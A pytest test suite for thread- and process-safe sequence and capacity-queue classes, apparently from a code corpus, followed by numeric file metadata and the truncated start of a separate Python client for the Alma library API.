'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # inser at end fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.insert.__name__), 'apply_params': ((init_len + 1000, "sadfasfd",), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.insert.__name__), apply_params=( (init_len + 123124, "sadfasfd",), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # c_insert fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.c_insert.__name__), 'apply_params': ((1, ("sadfasfd", 3.4, 11),), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((((csmlseq_twin[0],) + cast(Tuple[Any, ...], ("sadfasfd", 3.4, 11)) + tuple(csmlseq_twin[1:])),), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 3 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # c_insert at end fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.c_insert.__name__), 'apply_params': ((init_len + 12312, ("sadfasfd", 3.4, 11),), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=(((tuple(csmlseq_twin) + cast(Tuple[Any, ...], ("sadfasfd", 3.4, 11))),), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 3 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # apply - incr len fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.c_apply.__name__), 'apply_params': (None, { 'index': slice(1, 3), 'func': __apply_to_str_seq_incr_len }), 'apply_check_result': (APPLY_RETURN,) # Must be a tuple of length 1! }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=__apply_helper, apply_params=(None, { 'index': slice(1, 3), 'func': __apply_to_str_seq_incr_len }), apply_check_result=(APPLY_RETURN,)) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # apply - decr len fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.c_apply.__name__), 'apply_params': (None, { 'index': slice(1, 3), 'func': __apply_to_str_seq_decr_len }), 'apply_check_result': (APPLY_RETURN,) # Must be a tuple of length 1! }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=__apply_helper, apply_params=(None, { 'index': slice(1, 3), 'func': __apply_to_str_seq_decr_len }), apply_check_result=(APPLY_RETURN,)) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) - 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata fix_exec.c_join() # noinspection PyArgumentList def test_csmlseqdata_concurrent( fix_csl: cs.En.CSL, fix_init_csmseqdata: con.Pr.Iterable[Any], fix_manager: Optional[mp_mngr.SyncManager], fix_csmlseq_factory: Callable[[cs.En.CSL, con.Pr.Iterable[TYPE], Optional[mp_mngr.SyncManager]], csdata.Pr.CSMutableLengthSequence[TYPE]], fix_exec: execs.Im.Exec) -> None: fix_init_csmseqdata = tuple(fix_init_csmseqdata) init_len: Final[int] = len(fix_init_csmseqdata) assert init_len > 2 csmlseq: csdata.Pr.CSMutableLengthSequence[Any] = cast(csdata.Pr.CSMutableLengthSequence[Any], fix_csmlseq_factory(fix_csl, fix_init_csmseqdata, fix_manager)) if fix_csl > cs.En.CSL.SINGLE_THREAD: # test_blocking - delete for del_name in (csmlseq.__delitem__.__name__, csmlseq.c_delete.__name__): # int index execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, csmlseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, del_name), 'params_1': ((1,), {}), 'el_2': ft.c_identity, 'params_2': ((None,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmlseq[0:] = fix_init_csmseqdata # slice index execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, csmlseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, del_name), 'params_1': ((slice(1, 3),), {}), 'el_2': ft.c_identity, 'params_2': ((None,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmlseq[0:] = fix_init_csmseqdata # test blocking - extend, iadd, c_extend for extend_name in (csmlseq.__iadd__.__name__, csmlseq.extend.__name__, csmlseq.c_extend.__name__): execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, csmlseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=(csmlseq, extend_name), params=(((1, 2, "sadf"),), {}), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmlseq[0:] = fix_init_csmseqdata # test blocking - append, c_append for append_name in (csmlseq.append.__name__, csmlseq.c_append.__name__): execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, csmlseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, append_name), 'params_1': ((3342,), {}), 'el_2': ft.c_identity, 'params_2': ((None,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmlseq[0:] = fix_init_csmseqdata # test blocking - clear execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, csmlseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.clear.__name__), 'params_1': ((), {}), 'el_2': ft.c_identity, 'params_2': ((None,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmlseq[0:] = fix_init_csmseqdata # test blocking - insert execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, csmlseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.insert.__name__), 'params_1': ((1, "sadf"), {}), 'el_2': ft.c_identity, 'params_2': ((None,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmlseq[0:] = fix_init_csmseqdata # test blocking - pop execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, csmlseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.pop.__name__), 'params_1': ((), {}), 'el_2': ft.c_identity, 'params_2': ((fix_init_csmseqdata[-1],), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmlseq[0:] = fix_init_csmseqdata # test blocking - remove execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, csmlseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.remove.__name__), 'params_1': ((csmlseq[1],), {}), 'el_2': ft.c_identity, 'params_2': ((None,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmlseq[0:] = fix_init_csmseqdata # test blocking - remove execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, csmlseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_insert.__name__), 'params_1': ((1, (2, 4, "sdf")), {}), 'el_2': ft.c_identity, 'params_2': ((None,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmlseq[0:] = fix_init_csmseqdata fix_exec.c_join() QUEUE_CAP: Final[int] = 10 FILL_ELEM: Final[str] = "ABCDEFGASDASDLSLSLSLSLALAEIOIQEGBASKFJBAKDLGJBAKDJBFAKLSD" def __c_fill_capqueue(queue: csdata.Pr.CSCapacityQueue[Any], full_timeout: Optional[float] = None) -> None: assert queue.c_capacity() == QUEUE_CAP assert queue.qsize() <= QUEUE_CAP for _ in range(QUEUE_CAP - queue.qsize()): queue.c_put(item=FILL_ELEM) assert queue.qsize() == QUEUE_CAP with pytest.raises(Full): queue.c_put(item=FILL_ELEM, blocking=False) if full_timeout is not None: with pytest.raises(Full): queue.c_put(item=FILL_ELEM, blocking=True, timeout=full_timeout) def __c_empty_capqueue(queue: csdata.Pr.CSCapacityQueue[TYPE], empty_timeout: Optional[float] = None) -> None: assert queue.c_capacity() == QUEUE_CAP assert queue.qsize() <= QUEUE_CAP for _ in range(queue.qsize()): queue.c_get() assert queue.qsize() == 0 with pytest.raises(Empty): queue.c_get(blocking=False) if empty_timeout is not None: with pytest.raises(Empty): queue.c_get(blocking=True, timeout=empty_timeout) def __c_put_all_in_capqueue(queue: csdata.Pr.CSCapacityQueue[Any], items: con.Pr.Sequence[Any]) -> None: assert c_assert_not_none(queue.c_capacity()) - queue.qsize() >= len(items) for item in items: queue.c_put(item=item) def __c_compare_all_in_capqueue(queue: csdata.Pr.CSCapacityQueue[Any], items: con.Pr.Sequence[Any]) -> None: assert queue.qsize() == len(items) for i in range(queue.qsize()): assert items[i] == queue.c_get() assert queue.empty() # noinspection PyArgumentList def test_cscapacityqueue(fix_csl: cs.En.CSL, fix_init_queue: con.Pr.SizedIterable[Any], fix_manager: Optional[mp_mngr.SyncManager], fix_cscapacityqueue_factory: Callable[[cs.En.CSL, con.Pr.SizedIterable[TYPE], Optional[int], Optional[mp_mngr.SyncManager]], csdata.Pr.CSCapacityQueue[TYPE]], fix_exec: execs.Im.Exec) -> None: fix_init_queue = con.Ca.c_to_seq(obj=fix_init_queue) assert len(fix_init_queue) <= QUEUE_CAP cs_cap_queue: Final[csdata.Pr.CSCapacityQueue[Any]] = fix_cscapacityqueue_factory( fix_csl, fix_init_queue, QUEUE_CAP, fix_manager ) execs.Ca.c_exec_multiple(csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (cs_cap_queue, cs_cap_queue.qsize.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), {'el': len(fix_init_queue)}) }), 'max_check_count': 1 }), join=True), execs.Im.ExecDelayedParams( func_or_obj_func=__c_fill_capqueue, params=((), { 'queue': cs_cap_queue, 'full_timeout': 4.0 }), join=True, min_sec=4.0, max_sec=7.0) ], manager=fix_manager, _min_sec=4.0, _max_sec=7.0) assert cs_cap_queue.full() assert cs_cap_queue.qsize() == QUEUE_CAP == cs_cap_queue.c_capacity() if fix_csl > cs.En.CSL.SINGLE_THREAD: execs.Ca.c_exec_multiple(csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecDelayedParams( func_or_obj_func=(cs_cap_queue, cs_cap_queue.c_get.__name__), params=None, join=False, in_delay=4.0), execs.Im.ExecDelayedParams( func_or_obj_func=(cs_cap_queue, cs_cap_queue.c_put.__name__), params=((), { 'item': FILL_ELEM }), join=True, min_sec=3.0, max_sec=5.0) ], manager=fix_manager, _min_sec=3.0, _max_sec=5.0) assert cs_cap_queue.full() assert cs_cap_queue.qsize() == QUEUE_CAP == cs_cap_queue.c_capacity() execs.Ca.c_exec_multiple(csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecDelayedParams( func_or_obj_func=__c_empty_capqueue, params=((), { 'queue': cs_cap_queue, 'empty_timeout': 4.0 }), join=True, min_sec=4.0, max_sec=7.0) ], manager=fix_manager, _min_sec=4.0, _max_sec=7.0) assert cs_cap_queue.empty() assert cs_cap_queue.qsize() == 0 if fix_csl > cs.En.CSL.SINGLE_THREAD: execs.Ca.c_exec_multiple(csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecDelayedParams( func_or_obj_func=(cs_cap_queue, cs_cap_queue.c_put.__name__), params=((), { 'item': FILL_ELEM }), join=False, in_delay=4.0), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (cs_cap_queue, cs_cap_queue.c_get.__name__), 'params_1': ((), {}), 'el_2': ft.c_identity, 'params_2': ((), { 'el': FILL_ELEM }) }), 'max_check_count': 1 }), join=True, min_sec=3.0, max_sec=5.0) ], manager=fix_manager, _min_sec=3.0, _max_sec=5.0) assert cs_cap_queue.empty() assert cs_cap_queue.qsize() == 0 execs.Ca.c_exec_multiple(csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=__c_put_all_in_capqueue, params=((), { 'queue': cs_cap_queue, 'items': fix_init_queue }), join=True), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (cs_cap_queue, cs_cap_queue.qsize.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), {'el': len(fix_init_queue)}) }), 'max_check_count': 1 }), join=True), execs.Im.ExecParams( func_or_obj_func=__c_compare_all_in_capqueue, params=((), { 'queue': cs_cap_queue, 'items': fix_init_queue }), join=True), ], manager=fix_manager) fix_exec.c_join() # noinspection PyArgumentList def test_cschunkcapacityqueue( fix_csl: cs.En.CSL, fix_manager: Optional[mp_mngr.SyncManager], fix_cschunkcapacityqueue_factory: Callable[[cs.En.CSL, con.Pr.SizedIterable[Any], Optional[int], Optional[int], Optional[int], Optional[mp_mngr.SyncManager]], csdata.Pr.CSCapacityQueue[Any]], fix_exec: execs.Im.Exec) -> None: cs_cap_queue: csdata.Pr.CSCapacityQueue[Any] with pytest.raises(ValueError): fix_cschunkcapacityqueue_factory( fix_csl, (), QUEUE_CAP, -1, None, fix_manager) with pytest.raises(ValueError): fix_cschunkcapacityqueue_factory( fix_csl, (), QUEUE_CAP, 0, -22, fix_manager) with pytest.raises(ValueError): fix_cschunkcapacityqueue_factory( fix_csl, (), QUEUE_CAP, 22, 21, fix_manager) cs_cap_queue = fix_cschunkcapacityqueue_factory( fix_csl, cast(con.Pr.SizedIterable[Any], ()), QUEUE_CAP, 4, 4, fix_manager) with pytest.raises(ValueError): cs_cap_queue.c_put(item=(3, 4, 5)) with pytest.raises(ValueError): cs_cap_queue.put((3, 4, 5)) with pytest.raises(ValueError): cs_cap_queue.put_nowait((3, 4, 5)) with pytest.raises(ValueError): cs_cap_queue.c_put(item=(3, 4, 5, 5, 6)) with pytest.raises(ValueError): cs_cap_queue.put((3, 4, 5, 5, 6)) with pytest.raises(ValueError): cs_cap_queue.put_nowait((3, 4, 5, 5, 6)) cs_cap_queue.c_put((3, 4, 5, 5)) execs.Ca.c_exec_multiple(csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (cs_cap_queue, cs_cap_queue.c_get.__name__), 'params_1': ((), {}), 'el_2': ft.c_identity, 'params_2': ((), { 'el': (3, 4, 5, 5) }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager) cs_cap_queue = fix_cschunkcapacityqueue_factory( fix_csl, (), QUEUE_CAP, 4, 6, fix_manager) with pytest.raises(ValueError): cs_cap_queue.c_put(item=(3, 4, 5)) with pytest.raises(ValueError): cs_cap_queue.put((3, 4, 5)) with pytest.raises(ValueError): cs_cap_queue.put_nowait((3, 4, 5)) with pytest.raises(ValueError): cs_cap_queue.c_put(item=(3, 4, 5, 5, 6, 5, 6)) with pytest.raises(ValueError): cs_cap_queue.put((3, 4, 5, 5, 6, 5, 6)) with pytest.raises(ValueError): cs_cap_queue.put_nowait((3, 4, 5, 5, 6, 5, 6)) cs_cap_queue.c_put((3, 4, 5, 5)) execs.Ca.c_exec_multiple(csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (cs_cap_queue, cs_cap_queue.c_get.__name__), 'params_1': ((), {}), 'el_2': ft.c_identity, 'params_2': ((), { 'el': (3, 4, 5, 5) }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager) fix_exec.c_join()
42.72606
118
0.327201
12,764
179,364
4.164447
0.018803
0.030025
0.030816
0.044511
0.955658
0.941925
0.935848
0.925388
0.917675
0.908607
0
0.018559
0.57792
179,364
4,197
119
42.73624
0.683565
0.007744
0
0.914991
0
0
0.065575
0.00032
0
0
0
0
0.006872
1
0.005599
false
0
0.0028
0.001273
0.010944
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
1
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
fb5669294d062d35bf0b2ad4f79549ec852a8ebf
4,527
py
Python
alma_api/__init__.py
JonkopingUniversityLibrary/almaapi
40f43e54fdc1406e2222331e8be88228246a3bb9
[ "MIT" ]
1
2020-02-07T03:26:50.000Z
2020-02-07T03:26:50.000Z
alma_api/__init__.py
JonkopingUniversityLibrary/almaapi
40f43e54fdc1406e2222331e8be88228246a3bb9
[ "MIT" ]
null
null
null
alma_api/__init__.py
JonkopingUniversityLibrary/almaapi
40f43e54fdc1406e2222331e8be88228246a3bb9
[ "MIT" ]
null
null
null
import httplib2 as http import xml.etree.ElementTree as ElementTree import json class AlmaAPIException(Exception): """Custom docstring""" class AlmaAPI: def __init__(self, api, api_key): self.api_url = 'https://api-eu.hosted.exlibrisgroup.com/almaws/v1/' + api + '/' self.api_key = '?apikey=' + api_key def get(self, *, request=False, query_params=None): if request is False: return False __query_params__ = '' if query_params is not None: for key, value in query_params.items(): __query_params__ += '&' + key + '=' + value url = self.api_url + request + self.api_key + __query_params__ try: (response, content) = http.Http().request(url) except TimeoutError as e: raise AlmaAPIException('GET - ' + str(e)) try: if response.status != 200: if query_params['format'] == 'json': error_data = json.loads(content) try: error_message = error_data['errorList']['error'][0]['errorMessage'] except KeyError as e: error_message = 'Unknown Error' raise AlmaAPIException('GET - ' + str(response.status) + ' - ' + error_message) else: root = 